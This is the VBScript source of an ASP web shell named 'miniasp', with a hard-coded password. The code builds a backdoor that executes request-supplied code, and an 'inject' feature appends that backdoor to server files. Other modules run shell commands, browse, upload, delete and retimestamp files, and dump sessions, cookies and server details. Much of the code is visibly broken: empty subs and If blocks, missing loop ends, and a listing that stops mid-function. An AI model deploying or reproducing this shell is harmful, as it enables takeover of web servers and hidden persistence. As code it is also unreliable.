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  • miniasp(no encode)

    <%@ LANGUAGE = VBScript.Encode %>
    echo "<html>" & vbNewLine
    echo "<head>" & vbNewLine

    If Session(m & "userPassword") = "" Then
    End If

    echo "<object runat='server' id='ws' scope='page' classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8'></object>" & vbNewLine
    echo "<object runat='server' id='ws' scope='page' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>" & vbNewLine
    echo "<object runat='server' id='fso' scope='page' classid='clsid:0D43FE01-F093-11CF-8940-00A0C9054228'></object>" & vbNewLine
    echo "<object runat='server' id='sa' scope='page' classid='clsid:13709620-C279-11CE-A49E-444553540000'></object>" & vbNewLine
    echo "</head>" & vbNewLine

    echo "<body>" & vbNewLine
    '  Option Explicit

      Dim theAct, sTime, aspPath, pageName, strBackDoor, fsoX, saX, wsX

      sTime = Timer
      theAct= Request("theAct")
      pageName = Request("pageName")
      aspPath = Replace(Server.MapPath(".") & "\~86.tmp", "\\", "\") ''系统临时文件
      strBackDoor = "<script language=vbscript runat=server>"
      strBackDoor = strBackDoor & "If Request(""" & clientPassword & """)<>"""" Then Session(""#"")=Request(""" & clientPassword & """)" & VbNewLine
      strBackDoor = strBackDoor & "If Session(""#"")<>"""" Then Execute(Session(""#""))"
      strBackDoor = strBackDoor & "</script>"              ''插入的后门代码
      Const m = "Apple_"          ''自定义Session前缀
      Const showLogin = ""          ''为空直接显示登录界面,否则用"?pageName=它的值"来进行访问
      Const clientPassword = "#"        ''插入后门的密码,如果要插入数据库中,只能为一个字符.
      Const dbSelectNumber = 10        ''数据库操作时默认从表中选取的数据量
      Const isDebugMode = False        ''是否调试模式
      Const myName = "Login"      ''登录页按扭上的文字
      Const notdownloadsExists = False    ''原ACCESS数据库中是否存在notdownloadsExists表
      Const userPassword = "miniasp"    ''管理密码
      Const myCmdDotExeFile = "command.com"  ''定义cmd.exe文件的文件名
      Const strJsCloseMe = "<input type=button value=' 关闭 ' onclick='window.close();'>"

      Sub createIt(fsoX, saX, wsX)
        If isDebugMode = False Then
          On Error Resume Next
        End If

        Set fsoX = Server.CreateObject("Scripting.FileSystemObject")
        If IsEmpty(fsoX) And (pageName = "FsoFileExplorer" Or theAct = "fsoSearch") Then
          Set fsoX = fso
        End If

        Set saX = Server.CreateObject("Shell.Application")
        If IsEmpty(saX) And (pageName = "AppFileExplorer" Or pageName = "SaCmdRun" Or theAct = "saSearch") Then
          Set saX = sa
        End If

        Set wsX = Server.CreateObject("WScript.Shell")
        If IsEmpty(wsX) And (pageName = "WsCmdRun" Or theAct = "getTerminalInfo" Or theAct = "readReg") Then
          Set wsX = ws
        End If

        If Err Then
        End If
      End Sub

      Sub chkErr(Err)
        If Err Then
          echo "<style>body{ margin:8;border:none;overflow:hidden;background-color:buttonface; }</style>"
          echo "<br/><font size=2><li>错误: " & Err.Description & "</li><li>错误源: " & Err.Source & "</li><br/>"
          echo "<hr></font>"
        End If
      End Sub
      Sub echo(str)
      End Sub
      Sub isIn()
        If pageName <> "" And PageName <> "login" And PageName <> showLogin Then
          If Session(m & "userPassword") <> userPassword Then
          End If
        End If
      End Sub
      Sub showTitle(str)
        echo "<title>" & str & "</title>" & vbNewLine
        echo "<meta http-equiv='Content-Type' content='text/html; charset=gb2312'>" & vbNewLine
      End Sub
      Function fixNull(str)
        If IsNull(str) Then
          str = " "
        End If
        fixNull = str
      End Function
      Function encode(str)
        str = Server.HTMLEncode(str)
        str = Replace(str, vbNewLine, "<br>")
        str = Replace(str, " ", " ")
        str = Replace(str, "  ", " ")
        encode = str
      End Function
      Function getTheSize(theSize)
        If theSize >= (1024 * 1024 * 1024) Then getTheSize = Fix((theSize / (1024 * 1024 * 1024)) * 100) / 100 & "G"
        If theSize >= (1024 * 1024) And theSize < (1024 * 1024 * 1024) Then getTheSize = Fix((theSize / (1024 * 1024)) * 100) / 100 & "M"
        If theSize >= 1024 And theSize < (1024 * 1024) Then getTheSize = Fix((theSize / 1024) * 100) / 100 & "K"
        If theSize >= 0 And theSize <1024 Then getTheSize = theSize & "B"
      End Function
      Function HtmlEncode(str)
        If isNull(str) Then
          Exit Function
        End If
        HtmlEncode = Server.HTMLEncode(str)
      End Function
      Function UrlEncode(str)
        If isNull(str) Then
          Exit Function
        End If
        UrlEncode = Server.UrlEncode(str)
      End Function
      Sub redirectTo(strUrl)
        Response.Redirect(Request.ServerVariables("URL") & strUrl)
      End Sub

      Function trimThePath(strPath)
        If Right(strPath, 1) = "\" And Len(strPath) > 3 Then
          strPath = Left(strPath, Len(strPath) - 1)
        End If
        trimThePath = strPath
      End Function

      Sub alertThenClose(strInfo)
        Response.Write "<script>alert(""" & strInfo & """);window.close();</script>"
      End Sub

      Sub showErr(str)
        Dim i, arrayStr
        str = Server.HtmlEncode(str)
        arrayStr = Split(str, "$$")
    '    Response.Clear
        echo "<font size=2>"
        echo "出错信息:<br/><br/>"
        For i = 0 To UBound(arrayStr)
          echo " " & (i + 1) & ". " & arrayStr(i) & "<br/>"
        echo "</font>"
      End Sub

      Rem =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Rem 下面是程序模块选择部分
      Rem =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

      Call createIt(fsoX, saX, wsX)

      Select Case pageName
        Case showLogin, "login"
        Case "PageList"
        Case "objOnSrv"
        Case "ServiceList"
        Case "userList"
        Case "CSInfo"
        Case "infoAboutSrv"
        Case "AppFileExplorer"
        Case "SaCmdRun"
        Case "WsCmdRun"
        Case "FsoFileExplorer"
        Case "MsDataBase"
        Case "OtherTools"
        Case "TxtSearcher"
        Case "PageAddToMdb"
     Case "HtmlEncodeDecode"
      End Select
      Set saX = Nothing
      Set wsX = Nothing
      Set fsoX = Nothing

      Rem =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
      Rem   下面是各独立功能模块
      Rem =-=-=-=-=-=-=-=-=-=-=-=-=-=-=

      Sub PageAppFileExplorer()
        Response.Buffer = True
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Dim strExtName, thePath, objFolder, objMember, strDetails, strPath, strNewName
        Dim intI, theAct, strTmp, strFolderList, strFileList, strFilePath, strFileName, strParentPath


        theAct = Request("theAct")
        strNewName = Request("newName")
        thePath = Replace(LTrim(Request("thePath")), "\\", "\")
        If theAct <> "upload" Then
          If Request.Form.Count > 0 Then
            theAct = Request.Form("theAct")
            thePath = Replace(LTrim(Request.Form("thePath")), "\\", "\")
          End If
        End If

        echo "<style>body{ margin:8; }</style>"
        Select Case theAct
          Case "openUrl"
          Case "showEdit"
            Call showEdit(thePath, "stream")
          Case "saveFile"
            Call saveToFile(thePath, "stream")
          Case "copyOne", "cutOne"
            If thePath = "" Then
            End If
            Session(m & "appThePath") = thePath
            Session(m & "appTheAct") = theAct
          Case "pastOne"
          Case "rename"
          Case "downTheFile"
          Case "theAttributes"
          Case "showUpload"
            Call showUpload(thePath, "AppFileExplorer")
          Case "upload"
            Call showUpload(thePath, "AppFileExplorer")
          Case "inject"
            strTmp = streamLoadFromFile(thePath)
            fsoSaveToFile thePath, strTmp & strBackDoor
        End Select
        If theAct <> "" Then
        End If
        Set objFolder = saX.NameSpace(thePath)
        If Request.Form.Count > 0 Then
          redirectTo("?pageName=AppFileExplorer&thePath=" & UrlEncode(thePath))
        End If
        echo "<input type=hidden name=usePath><input type=hidden value=AppFileExplorer name=pageName>"
        echo "<input type=hidden value='" & HtmlEncode(thePath) & "' name=truePath>"
        echo "<div style='left:0px;100%;height:48px;position:absolute;top:2px;' id=fileExplorerTools>"
        echo "<input type=button value=' 打开 ' onclick='openUrl();'>"
        echo "<input type=button value=' 编辑 ' onclick='editFile();'>"
        echo "<input type=button value=' 复制 ' onclick=appDoAction('copyOne');>"
        echo "<input type=button value=' 剪切 ' onclick=appDoAction('cutOne');>"
        echo "<input type=button value=' 粘贴 ' onclick=appDoAction2('pastOne');>"
        echo "<input type=button value=' 上传 ' onclick='upTheFile();'>"
        echo "<input type=button value=' 下载 ' onclick='downTheFile();'>"
        echo "<input type=button value=' 属性 ' onclick='appTheAttributes();'>"
        echo "<input type=button value=' 插入 ' onclick=appDoAction('inject');>"
        echo "<input type=button value='重命名' onclick='appRename();'>"
        echo "<input type=button value='我的电脑' onclick=location.href='?pageName=AppFileExplorer&thePath='>"
        echo "<input type=button value='控制面板' onclick=location.href='?pageName=AppFileExplorer&thePath=::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\::{21EC2020-3AEA-1069-A2DD-08002B30309D}'>"
        echo "<form method=post action='?pageName=AppFileExplorer'>"
        echo "<input type=button value=' 后退 ' onclick='this.disabled=true;history.back();'>"
        echo "<input type=button value=' 前进 ' onclick='this.disabled=true;history.go(1);'>"
        echo "<input type=button value=站点根 onclick=""location.href='?pageName=AppFileExplorer&thePath=" & URLEncode(Server.MapPath("\")) & "';"">"
        echo "<input style='60%;' name=thePath value='" & HtmlEncode(thePath) & "'>"
        echo "<input type=submit value=' GO.'><input type=button value=' 刷新 ' onclick='location.reload();'></form><hr/>"
        echo "</div><div style='height:50px;'></div>"
        echo "<script>fixTheLayer('fileExplorerTools');setInterval(""fixTheLayer('fileExplorerTools');"", 200);</script>"

        For Each objMember In objFolder.Items
          intI = intI + 1
          If intI > 200 Then
            intI = 0
          End If
          If objMember.IsFolder = True Then
            If Left(objMember.Path, 2) = "::" Then
              strPath = URLEncode(objMember.Path)
              strPath = URLEncode(objMember.Path) & "%5C"
            End If
            strFolderList = strFolderList & "<span id=""" & strPath & """ ondblclick='changeThePath(this);' onclick='changeMyClass(this);'><font class=font face=Wingdings>0</font><br/>" & objMember.Name & "</span>"
             strDetails = objFolder.GetDetailsOf(objMember, -1)
             strFilePath = objMember.Path
            strFileName = Mid(strFilePath, InStrRev(strFilePath, "\") + 1)
            strExtName = Split(strFileName, ".")(UBound(Split(strFileName, ".")))
            strFileList = strFileList & "<span title=""" & strDetails & """ ondblclick='openUrl();' id=""" & URLEncode(strFilePath) & """ onclick='changeMyClass(this);'><font class=font face=" & getFileIcon(strExtName) & "</font><br/>" & strFileName & "</span>"
          End If

        strParentPath = getParentPath(thePath)
        If thePath <> "" And Left(thePath, 2) <> "::" Then
          strFolderList = "<span id=""" & URLEncode(strParentPath) & """ ondblclick='changeThePath(this);' onclick='changeMyClass(this);'><font class=font face=Wingdings>0</font><br/>..</span>" & strFolderList
        End If

        echo "<div id=FileList>"
        echo strFolderList & strFileList
        echo "</div>"
        echo "<hr/>"
        Set objFolder = Nothing
      End Sub
      Function getParentPath(strPath)
        If Right(strPath, 1) = "\" Then
          strPath = Left(strPath, Len(strPath) - 1)
        End If
        If Len(strPath) = 2 Then
          getParentPath = " "
          getParentPath = Left(strPath, InStrRev(strPath, "\"))
        End If
      End Function

      Function streamSaveToFile(thePath, fileContent)
        Dim stream
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Set stream = Server.CreateObject("adodb.stream")
        With stream
          .WriteText fileContent
          .saveToFile thePath, 2
        End With
        Set stream = Nothing
      End Function
      Sub appDoPastOne(thePath)
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Dim strAct, strPath
        dim objTargetFolder
        strAct = Session(m & "appTheAct")
        strPath = Session(m & "appThePath")
        If strAct = "" Or strPath = "" Then
          Exit Sub
        End If
        If InStr(LCase(thePath), LCase(strPath)) > 0 Then
          Exit Sub
        End If

        strPath = trimThePath(strPath)
        thePath = trimThePath(thePath)

        Set objTargetFolder = saX.NameSpace(thePath)
        If strAct = "copyOne" Then
        End If
        Set objTargetFolder = Nothing
      End Sub
      Sub appTheAttributes(thePath)
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Dim i, strSth, objFolder, objItem, strModifyDate
        strModifyDate = Request("ModifyDate")
        thePath = trimThePath(thePath)

        If thePath = "" Then
          Exit Sub
        End If

        strSth = Left(thePath, InStrRev(thePath, "\"))
        Set objFolder = saX.NameSpace(strSth)
        strSth = Split(thePath, "\")(UBound(Split(thePath, "\")))
        Set objItem = objFolder.ParseName(strSth)

        If isDate(strModifyDate) Then
          objItem.ModifyDate = strModifyDate
          Set objItem = Nothing
          Set objFolder = Nothing
          Exit Sub
        End If
    '    strSth = objFolder.GetDetailsOf(objItem, -1)
    '    strSth = Replace(strSth, chr(10), "<br/>")
        For i = 1 To 8
          strSth = strSth & "<br/>属性(" & i & "): " & objFolder.GetDetailsOf(objItem, i)
        strSth = Replace(strSth, "属性(1)", "大小")
        strSth = Replace(strSth, "属性(2)", "类型")
        strSth = Replace(strSth, "属性(3)", "最后修改")
        strSth = Replace(strSth, "属性(8)", "所有者")
        strSth = strSth & "<form method=post>"
        strSth = strSth & "<input type=hidden name=theAct value=theAttributes>"
        strSth = strSth & "<input type=hidden name=thePath value=""" & thePath & """>"
        strSth = strSth & "<br/>最后修改: <input size=30 value='" & objFolder.GetDetailsOf(objItem, 3) & "' name=ModifyDate />"
        strSth = strSth & "<input type=submit value=' 修改 '>"
        strSth = strSth & "</form>"
        echo strSth
        Set objItem = Nothing
        Set objFolder = Nothing
      End Sub
      Sub appRenameOne(thePath)
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Dim strSth, fileName, objItem, objFolder
        fileName = Request("fileName")
        thePath = trimThePath(thePath)

        strSth = Left(thePath, InStrRev(thePath, "\"))
        Set objFolder = saX.NameSpace(strSth)
        strSth = Split(thePath, "\")(UBound(Split(thePath, "\")))
        Set objItem = objFolder.ParseName(strSth)
        strSth = Split(thePath, ".")(UBound(Split(thePath, ".")))
        If fileName <> "" Then
          objItem.Name = fileName
          Set objItem = Nothing
          Set objFolder = Nothing
          Exit Sub
        End If
        echo "<form method=post>重命名:"
        echo "<input type=hidden name=theAct value=rename>"
        echo "<input type=hidden name=thePath value=""" & thePath & """>"
        echo "<br/><input size=30 value=""" & objItem.Name & """ name=fileName />"
        If InStr(strSth, ":") <= 0 Then
          echo "." & strSth
        End If
        echo "<hr/><input type=submit value=' 修改 '>" & strJsCloseMe
        echo "</form>"
        Set objItem = Nothing
        Set objFolder = Nothing
      End Sub

      Sub PageCSInfo()
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Dim strKey, strVar, strVariable
        echo "<a href=javascript:showHideMe(ServerVariables);>ServerVariables:</a>"
        echo "<span id=ServerVariables style='display:none;'>"
        For Each strVariable In Request.ServerVariables
          echo "<li>" & strVariable & ": " & Request.ServerVariables(strVariable) & "</li>"
        echo "</span>"
        echo "<br/><a href=javascript:showHideMe(Application);>Application:</a>"
        echo "<span id=Application style='display:none;'>"
        For Each strVariable In Application.Contents
          echo "<li>" & strVariable & ": " & Encode(Application(strVariable)) & "</li>"
          If Err Then
            For Each strVar In Application.Contents(strVariable)
              echo "<li>" & strVariable & "(" & strVar & "): " & Encode(Application(strVariable)(strVar)) & "</li>"
          End If
        echo "</span>"

        echo "<br/><a href=javascript:showHideMe(Session);>Session:(ID" & Session.SessionId & ")</a>"
        echo "<span id=Session style='display:none;'>"
        For Each strVariable In Session.Contents
          echo "<li>" & strVariable & ": " & Encode(Session(strVariable)) & "</li>"
        echo "</span>"
        echo "<br/><a href=javascript:showHideMe(Cookies);>Cookies:</a>"
        echo "<span id=Cookies style='display:none;'>"
        For Each strVariable In Request.Cookies
          If Request.Cookies(strVariable).HasKeys Then
            For Each strKey In Request.Cookies(strVariable)
              echo "<li>" & strVariable & "(" & strKey & "): " & HtmlEncode(Request.Cookies(strVariable)(strKey)) & "</li>"
            echo "<li>" & strVariable & ": " & Encode(Request.Cookies(strVariable)) & "</li>"
          End If
        echo "</span><hr/>"
      End Sub

      Sub PageFsoFileExplorer()
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Response.Buffer = True
        Dim file, drive, folder, theFiles, theFolder, theFolders
        Dim i, theAct, strTmp, driveStr, thePath, parentFolderName
        theAct = Request("theAct")
        thePath = Request("thePath")
        If theAct <> "upload" Then
          If Request.Form.Count > 0 Then
            theAct = Request.Form("theAct")
            thePath = Request.Form("thePath")
          End If
        End If

        Select Case theAct
          Case "newOne", "doNewOne"
          Case "showEdit"
            Call showEdit(thePath, "fso")
          Case "saveFile"
            Call saveToFile(thePath, "fso")
          Case "openUrl"
          Case "copyOne", "cutOne"
            If thePath = "" Then
            End If
            Session(m & "fsoThePath") = thePath
            Session(m & "fsoTheAct") = theAct
          Case "pastOne"
          Case "showFsoRename"
          Case "doRename"
            Call fsoRename(thePath)
          Case "delOne", "doDelOne"
          Case "getAttributes", "doModifyAttributes"
          Case "downTheFile"
          Case "showUpload"
            Call showUpload(thePath, "FsoFileExplorer")
          Case "upload"
            Call showUpload(thePath, "FsoFileExplorer")
          Case "inject"
            Set theFiles = fsoX.OpenTextFile(thePath)
            strTmp = theFiles.ReadAll()
            fsoSaveToFile thePath, strTmp & strBackDoor
            Set theFiles = Nothing
        End Select
        If theAct <> "" Then
        End If
        If Request.Form.Count > 0 Then
          redirectTo("?pageName=FsoFileExplorer&thePath=" & UrlEncode(thePath))
        End If
        parentFolderName = fsoX.GetParentFolderName(thePath)
        echo "<div style='left:0px;100%;height:48px;position:absolute;top:2px;' id=fileExplorerTools>"
        echo "<input type=button value=' 新建 ' onclick=newOne();>"
        echo "<input type=button value=' 更名 ' onclick=fsoRename();>"
        echo "<input type=button value=' 编辑 ' onclick=editFile();>"
        echo "<input type=button value=' 打开 ' onclick=openUrl();>"
        echo "<input type=button value=' 复制 ' onclick=appDoAction('copyOne');>"
        echo "<input type=button value=' 剪切 ' onclick=appDoAction('cutOne');>"
        echo "<input type=button value=' 粘贴 ' onclick=appDoAction2('pastOne')>"
        echo "<input type=button value=' 属性 ' onclick=fsoGetAttributes();>"
        echo "<input type=button value=' 插入 ' onclick=appDoAction('inject');>"
        echo "<input type=button value=' 删除 ' onclick=delOne();>"
        echo "<input type=button value=' 上传 ' onclick='upTheFile();'>"
        echo "<input type=button value=' 下载 ' onclick='downTheFile();'>"
        echo "<br/>"
        echo "<input type=hidden value=FsoFileExplorer name=pageName />"
        echo "<input type=hidden value=""" & UrlEncode(thePath) & """ name=truePath>"
        echo "<input type=hidden size=50 name=usePath>"

        echo "<form method=post action=?pageName=FsoFileExplorer>"
        If parentFolderName <> "" Then
          echo "<input value='↑向上' type=button onclick=""this.disabled=true;location.href='?pageName=FsoFileExplorer&thePath=" & Server.UrlEncode(parentFolderName) & "';"">"
        End If
        echo "<input type=button value=' 后退 ' onclick='this.disabled=true;history.back();' />"
        echo "<input type=button value=' 前进 ' onclick='this.disabled=true;history.go(1);' />"
        echo "<input size=60 value=""" & HtmlEncode(thePath) & """ name=thePath>"
        echo "<input type=submit value=' 转到 '>"
        driveStr = "<option>盘符</option>"
        driveStr = driveStr & "<option value='" & HtmlEncode(Server.MapPath(".")) & "'>.</option>"
        driveStr = driveStr & "<option value='" & HtmlEncode(Server.MapPath("/")) & "'>/</option>"
        For Each drive In fsoX.Drives
          driveStr = driveStr & "<option value='" & drive.DriveLetter & ":\'>" & drive.DriveLetter & ":\</option>"
        echo "<input type=button value=' 刷新 ' onclick='location.reload();'> "
        echo "<select onchange=""this.form.thePath.value=this.value;this.form.submit();"">" & driveStr & "</select>"
        echo "<hr/></form>"
        echo "</div><div style='height:50px;'></div>"
        echo "<script>fixTheLayer('fileExplorerTools');setInterval(""fixTheLayer('fileExplorerTools');"", 200);</script>"

        If fsoX.FolderExists(thePath) = False Then
          showErr(thePath & " 目录不存在或者不允许访问!")
        End If
        Set theFolder = fsoX.GetFolder(thePath)
        Set theFiles = theFolder.Files
        Set theFolders = theFolder.SubFolders

        echo "<div id=FileList>"
        For Each folder In theFolders
          i = i + 1
          If i > 50 Then
            i = 0
          End If
          strTmp = UrlEncode(folder.Path & "\")
          echo "<span id='" & strTmp & "' onDblClick=""changeThePath(this);"" onclick=changeMyClass(this);><font class=font face=Wingdings>0</font><br/>" & folder.Name & "</span>" & vbNewLine
        For Each file In theFiles
          i = i + 1
          If i > 100 Then
            i = 0
          End If
          echo "<span id='" & UrlEncode(file.Path) & "' title='类型: " & file.Type & vbNewLine & "大小: " & getTheSize(file.Size) & "' onDblClick=""openUrl();"" onclick=changeMyClass(this);><font class=font face=" & getFileIcon(fsoX.GetExtensionName(file.Name)) & "</font><br/>" & file.Name & "</span>" & vbNewLine
        echo "</div>"
        echo "<hr/>"
      End Sub
      Sub fsoNewOne(thePath)
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Dim theAct, isFile, theName, newAct
        isFile = Request("isFile")
        newAct = Request("newAct")
        theName = Request("theName")

        If newAct = " 确定 " Then
          thePath = Replace(thePath & "\" & theName, "\\", "\")
          If isFile = "True" Then
            Call fsoX.CreateTextFile(thePath, False)
          End If
        End If
        echo "<style>body{ overflow:hidden; }</style>"
        echo "<body topmargin=2>"
        echo "<form method=post>"
        echo "<input type=hidden name=thePath value=""" & HtmlEncode(thePath) & """><br/>新建: "
        echo "<input type=radio name=isFile id=file value='True' checked><label for=file>文件</label> "
        echo "<input type=radio name=isFile id=folder value='False'><label for=folder>文件夹</label><br/>"
        echo "<input size=38 name=theName><hr/>"
        echo "<input type=hidden name=theAct value=doNewOne>"
        echo "<input type=submit name=newAct value=' 确定 '>" & strJsCloseMe
        echo "</form>"
        echo "</body><br/>"
      End Sub
      Sub fsoPastOne(thePath)
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Dim sessionPath
        sessionPath = Session(m & "fsoThePath")
        If thePath = "" Or sessionPath = "" Then
        End If
        If Right(thePath, 1) = "\" Then
          thePath = Left(thePath, Len(thePath) - 1)
        End If
        If Right(sessionPath, 1) = "\" Then
          sessionPath = Left(sessionPath, Len(sessionPath) - 1)
          If Session(m & "fsoTheAct") = "cutOne" Then
            Call fsoX.MoveFolder(sessionPath, thePath & "\" & fsoX.GetFileName(sessionPath))
            Call fsoX.CopyFolder(sessionPath, thePath & "\" & fsoX.GetFileName(sessionPath))
          End If
          If Session(m & "fsoTheAct") = "cutOne" Then
            Call fsoX.MoveFile(sessionPath, thePath & "\" & fsoX.GetFileName(sessionPath))
            Call fsoX.CopyFile(sessionPath, thePath & "\" & fsoX.GetFileName(sessionPath))
          End If
        End If
      End Sub
      Sub fsoRename(thePath)
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Dim theFile, fileName, theFolder
        fileName = Request("fileName")
        If thePath = "" Or fileName = "" Then
        End If

        If Right(thePath, 1) = "\" Then
          Set theFolder = fsoX.GetFolder(thePath)
          theFolder.Name = fileName
          Set theFolder = Nothing
          Set theFile = fsoX.GetFile(thePath)
          theFile.Name = fileName
          Set theFile = Nothing
        End If
      End Sub
      Sub showFsoRename(thePath)
        Dim theAct, fileName
        fileName = fsoX.getFileName(thePath)
        echo "<style>body{ overflow:hidden; }</style>"
        echo "<body topmargin=2>"
        echo "<form method=post>"
        echo "<input type=hidden name=thePath value=""" & HtmlEncode(thePath) & """><br/>更名为:<br/>"
        echo "<input size=38 name=fileName value=""" & HtmlEncode(fileName) & """><hr/>"
        echo "<input type=submit value=' 确定 '>"
        echo "<input type=hidden name=theAct value=doRename>"
        echo "<input type=button value=' 关闭 ' onclick='window.close();'>"
        echo "</form>"
        echo "</body><br/>"
      End Sub
      Sub showFsoDelOne(thePath)
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Dim newAct, theFile
        newAct = Request("newAct")

        If newAct = "确认删除?" Then
          If Right(thePath, 1) = "\" Then
            thePath = Left(thePath, Len(thePath) - 1)
            Call fsoX.DeleteFolder(thePath, True)
            Call fsoX.DeleteFile(thePath, True)
          End If
        End If

        echo "<style>body{ margin:8;border:none;overflow:hidden;background-color:buttonface; }</style>"   
        echo "<form method=post><br/>"
        echo HtmlEncode(thePath)
        echo "<input type=hidden name=thePath value=""" & HtmlEncode(thePath) & """>"
        echo "<input type=hidden name=theAct value=doDelOne>"
        echo "<hr/><input type=submit name=newAct value='确认删除?'><input type=button value=' 关闭 ' onclick='window.close();'>"
        echo "</form>"
      End Sub
      Sub fsoTheAttributes(thePath)
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Dim newAct, theFile, theFolder, theTitle
        newAct = Request("newAct")
        If Right(thePath, 1) = "\" Then
          Set theFolder = fsoX.GetFolder(thePath)
          If newAct = " 修改 " Then
          End If
            theTitle = getMyTitle(theFolder)
          Set theFolder = Nothing
          Set theFile = fsoX.GetFile(thePath)
          If newAct = " 修改 " Then
          End If
          theTitle = getMyTitle(theFile)
          Set theFile = Nothing
        End If
        theTitle = Replace(theTitle, vbNewLine, "<br/>")
        echo "<style>body{ margin:8;overflow:hidden; }</style>"
        echo "<form method=post>"
        echo "<input type=hidden name=thePath value=""" & HtmlEncode(thePath) & """>"
        echo "<input type=hidden name=theAct value=doModifyAttributes>"
        echo theTitle
        echo "<hr/><input type=submit name=newAct value=' 修改 '>" & strJsCloseMe
        echo "</form>"
      End Sub
      Function getMyTitle(theOne)
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Dim strTitle
        strTitle = strTitle & "路径: " & theOne.Path & "" & vbNewLine
        strTitle = strTitle & "大小: " & getTheSize(theOne.Size) & vbNewLine
        strTitle = strTitle & "属性: " & getAttributes(theOne.Attributes) & vbNewLine
        strTitle = strTitle & "创建时间: " & theOne.DateCreated & vbNewLine
        strTitle = strTitle & "最后修改: " & theOne.DateLastModified & vbNewLine
        strTitle = strTitle & "最后访问: " & theOne.DateLastAccessed
        getMyTitle = strTitle
      End Function
      Sub setMyTitle(theOne)
        Dim i, myAttributes
        For i = 1 To Request("attributes").Count
          myAttributes = myAttributes + CInt(Request("attributes")(i))
        theOne.Attributes = myAttributes
        echo "<script>alert('该文件(夹)属性已按正确设置修改完成!');</script>"
      End Sub
      Function getAttributes(intValue)
        Dim strAtt
        strAtt = "<input type=checkbox name=attributes value=4 { $system }>系统 "
        strAtt = strAtt & "<input type=checkbox name=attributes value=2 { $hidden }>隐藏 "
        strAtt = strAtt & "<input type=checkbox name=attributes value=1 { $readonly }>只读 "
        strAtt = strAtt & "<input type=checkbox name=attributes value=32 { $archive }>存档<br/>   "
        strAtt = strAtt & "<input type=checkbox name=attributes { $normal } value=0>普通 "
        strAtt = strAtt & "<input type=checkbox name=attributes value=128 { $compressed }>压缩 "
        strAtt = strAtt & "<input type=checkbox name=attributes value=16 { $directory }>文件夹 "
        strAtt = strAtt & "<input type=checkbox name=attributes value=64 { $alias }>快捷方式"
    '    strAtt = strAtt & "<input type=checkbox name=attributes value=8 { $volume }>卷标 "
        If intValue = 0 Then
          strAtt = Replace(strAtt, "{ $normal }", "checked")
        End If
        If intValue >= 128 Then
          intValue = intValue - 128
          strAtt = Replace(strAtt, "{ $compressed }", "checked")
        End If
        If intValue >= 64 Then
          intValue = intValue - 64
          strAtt = Replace(strAtt, "{ $alias }", "checked")
        End If
        If intValue >= 32 Then
          intValue = intValue - 32
          strAtt = Replace(strAtt, "{ $archive }", "checked")
        End If
        If intValue >= 16 Then
          intValue = intValue - 16
          strAtt = Replace(strAtt, "{ $directory }", "checked")
        End If
        If intValue >= 8 Then
          intValue = intValue - 8
          strAtt = Replace(strAtt, "{ $volume }", "checked")
        End If
        If intValue >= 4 Then
          intValue = intValue - 4
          strAtt = Replace(strAtt, "{ $system }", "checked")
        End If
        If intValue >= 2 Then
          intValue = intValue - 2
          strAtt = Replace(strAtt, "{ $hidden }", "checked")
        End If
        If intValue >= 1 Then
          intValue = intValue - 1
          strAtt = Replace(strAtt, "{ $readonly }", "checked")
        End If
        getAttributes = strAtt
      End Function

      Sub PageInfoAboutSrv()
        Dim theAct
        theAct = Request("theAct")
        Select Case theAct
          Case ""
          Case "getSrvInfo"
          Case "getSrvDrvInfo"
          Case "getSiteRootInfo"
          Case "getTerminalInfo"
        End Select
        echo "<hr/>"
      End Sub

      Sub getSrvInfo()
        If isDebugMode = False Then
          On Error Resume Next
        End If
        Dim i, sa, objWshSysEnv, aryExEnvList, strExEnvList, intCpuNum, strCpuInfo, strOS
        Set sa = Server.CreateObject("Shell.Application")
        aryExEnvList = Split(strExEnvList, "$")
        Set objWshSysEnv = wsX.Environment("SYSTEM")

        intCpuNum = Request.ServerVariables("NUMBER_OF_PROCESSORS")
        If IsNull(intCpuNum) Or intCpuNum = "" Then
          intCpuNum = objWshSysEnv("NUMBER_OF_PROCESSORS")
        End If
        strOS = Request.ServerVariables("OS")
        If IsNull(strOS) Or strOS = "" Then
          strOS = objWshSysEnv("OS")
          strOs = strOs & "(有可能是 Windows2003 哦)"
        End If
        strCpuInfo = objWshSysEnv("PROCESSOR_IDENTIFIER")

        echo "<a href=javascript:showHideMe(srvInf);>服务器相关参数:</a>"
        echo "<ol id=srvInf><hr/>"
        echo "<li>服务器名: " & Request.ServerVariables("SERVER_NAME") & "</li>"
        echo "<li>服务器IP: " & Request.ServerVariables("LOCAL_ADDR") & "</li>"
        echo "<li>服务端口: " & Request.ServerVariables("SERVER_PORT") & "</li>"
        echo "<li>服务器内存: " & getTheSize(sa.GetSystemInformation("PhysicalMemoryInstalled")) & "</li>"
        echo "<li>服务器时间: " & Now & "</li>"
        echo "<li>服务器软件: " & Request.ServerVariables("SERVER_SOFTWARE") & "</li>"
        echo "<li>脚本超时时间: " & Server.ScriptTimeout & "</li>"
        echo "<li>服务器CPU数量: " & intCpuNum & "</li>"
        echo "<li>服务器CPU详情: " & strCpuInfo & "</li>"
        echo "<li>服务器操作系统: " & strOS & "</li>"
        echo "<li>服务器解译引擎: " & ScriptEngine & "/" & ScriptEngineMajorVersion & "." & ScriptEngineMinorVersion & "." & ScriptEngineBuildVersion & "</li>"
        echo "<li>本文件实际路径: " & Request.ServerVariables("PATH_TRANSLATED") & "</li>"
        echo "<hr/></ol>"
        echo "<br/><a href=javascript:showHideMe(srvEnvInf);>服务器相关参数:</a>"
        echo "<ol id=srvEnvInf><hr/>"
